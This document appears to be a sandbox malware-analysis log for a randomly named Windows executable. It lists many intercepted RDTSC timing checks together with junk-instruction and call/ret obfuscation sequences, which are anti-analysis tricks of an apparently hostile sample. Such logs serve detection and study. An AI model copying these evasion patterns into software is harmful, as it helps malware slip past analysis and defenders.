Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C2FDF second address: 3C3002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD0CDA8605h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C3002 second address: 3C3006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C3417 second address: 3C342C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA8601h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C35D2 second address: 3C35F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD0D216D62h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C35F0 second address: 3C3613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FAD0CDA8605h 0x0000000c jg 00007FAD0CDA85F6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C37C0 second address: 3C37D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b js 00007FAD0D216D56h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C37D7 second address: 3C37EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAD0CDA85F6h 0x0000000a ja 00007FAD0CDA85F6h 0x00000010 jns 00007FAD0CDA85F6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39A6 second address: 3C39AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39AA second address: 3C39CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD0CDA85F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAD0CDA8601h 0x00000011 pop edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39CD second address: 3C39D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39D1 second address: 3C39E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD0CDA85F6h 0x00000008 ja 00007FAD0CDA85F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39E5 second address: 3C39EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39EB second address: 3C39EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C39EF second address: 3C39F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C92AE second address: 3C92B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7F3E second address: 3C7F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7F60 second address: 3C7F81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAD0CDA8602h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jnc 00007FAD0CDA85F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C80F3 second address: 3C8125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAD0D216D56h 0x0000000a jmp 00007FAD0D216D5Eh 0x0000000f popad 0x00000010 jmp 00007FAD0D216D69h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8125 second address: 3C812C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8275 second address: 3C8286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FAD0D216D58h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C85AB second address: 3C85B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C85B1 second address: 3C85C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FAD0D216D56h 0x0000000f jo 00007FAD0D216D56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8731 second address: 3C8741 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD0CDA85FAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8741 second address: 3C8745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8745 second address: 3C874B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7C5D second address: 3C7C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7C61 second address: 3C7C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8605h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7C7A second address: 3C7C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7C83 second address: 3C7CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAD0CDA8603h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C7CA0 second address: 3C7CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FAD0D216D64h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C8D1E second address: 3C8D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE15B second address: 3CE161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE161 second address: 3CE172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAD0CDA85F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE172 second address: 3CE176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE2CD second address: 3CE316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FAD0CDA8611h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD0CDA85FCh 0x00000012 jmp 00007FAD0CDA8605h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE96F second address: 3CE992 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD0D216D67h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE992 second address: 3CE996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CE996 second address: 3CE99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CEC97 second address: 3CEC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3CEE15 second address: 3CEE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3D1152 second address: 3D1169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FAD0CDA8602h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3D1169 second address: 3D116E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 35414D second address: 354155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 354155 second address: 35417D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FAD0D216D61h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FAD0D216D56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39BACD second address: 379E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD0CDA8600h 0x00000008 jbe 00007FAD0CDA85F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FAD0CDA85F8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, ebx 0x00000030 mov ecx, edi 0x00000032 call dword ptr [ebp+122D2F7Dh] 0x00000038 push eax 0x00000039 push edx 0x0000003a ja 00007FAD0CDA85FEh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C1D0 second address: 39C1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C1D4 second address: 39C225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAD0CDA8600h 0x0000000b popad 0x0000000c push eax 0x0000000d jp 00007FAD0CDA85FEh 0x00000013 push ecx 0x00000014 jns 00007FAD0CDA85F6h 0x0000001a pop ecx 0x0000001b xchg eax, esi 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FAD0CDA85F8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 push eax 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jc 00007FAD0CDA85F6h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C3B6 second address: 39C3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C51A second address: 39C51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C51F second address: 39C5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0D216D61h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FAD0D216D5Eh 0x00000013 push eax 0x00000014 jl 00007FAD0D216D56h 0x0000001a pop eax 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FAD0D216D58h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 xor edi, 654E41A8h 0x0000003c jo 00007FAD0D216D59h 0x00000042 sub ch, 00000053h 0x00000045 push 00000004h 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007FAD0D216D58h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 sub dword ptr [ebp+122D2F87h], edi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push edi 0x0000006c pop edi 0x0000006d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CCA7 second address: 39CCAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CCAD second address: 39CCC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FAD0D216D58h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CD8B second address: 39CDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FAD0CDA85FCh 0x0000000b nop 0x0000000c mov dx, si 0x0000000f lea eax, dword ptr [ebp+1248683Fh] 0x00000015 mov dword ptr [ebp+122D1D8Bh], esi 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CDB4 second address: 39CDB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CDB8 second address: 39CDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CDBE second address: 39CDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CDC4 second address: 39CDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39CDC8 second address: 39CDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FAD0D216D60h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3D918F second address: 3D91A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnp 00007FAD0CDA85FCh 0x0000000b jng 00007FAD0CDA85F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3D97EC second address: 3D97F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3D9961 second address: 3D996B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD0CDA85F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E1301 second address: 3E1305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E41EF second address: 3E41F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E41F5 second address: 3E4216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0D216D64h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E4216 second address: 3E421A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E421A second address: 3E4231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E4231 second address: 3E4238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E4238 second address: 3E423E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E3D33 second address: 3E3D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FAD0CDA85FAh 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007FAD0CDA8624h 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007FAD0CDA85F6h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E3D53 second address: 3E3D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FAD0D216D56h 0x00000010 jns 00007FAD0D216D56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EA946 second address: 3EA959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007FAD0CDA85FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EA959 second address: 3EA979 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD0D216D63h 0x00000008 jnc 00007FAD0D216D56h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E928C second address: 3E929D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAD0CDA85FCh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E93EE second address: 3E93F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3E99E1 second address: 3E99E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C75A second address: 39C765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FAD0D216D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C765 second address: 39C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a or edi, dword ptr [ebp+122D3839h] 0x00000010 mov ebx, dword ptr [ebp+1248683Ah] 0x00000016 call 00007FAD0CDA85FEh 0x0000001b mov dword ptr [ebp+1244B138h], esi 0x00000021 pop ecx 0x00000022 add eax, ebx 0x00000024 mov edi, ecx 0x00000026 nop 0x00000027 jl 00007FAD0CDA8605h 0x0000002d jmp 00007FAD0CDA85FFh 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39C7AF second address: 39C816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0D216D63h 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007FAD0D216D56h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 sub edi, 4E7DB986h 0x0000001c push 00000004h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FAD0D216D58h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 movzx ecx, ax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FAD0D216D61h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EDC7C second address: 3EDC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EDDE5 second address: 3EDDEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3EDDEB second address: 3EDE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD0CDA8607h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
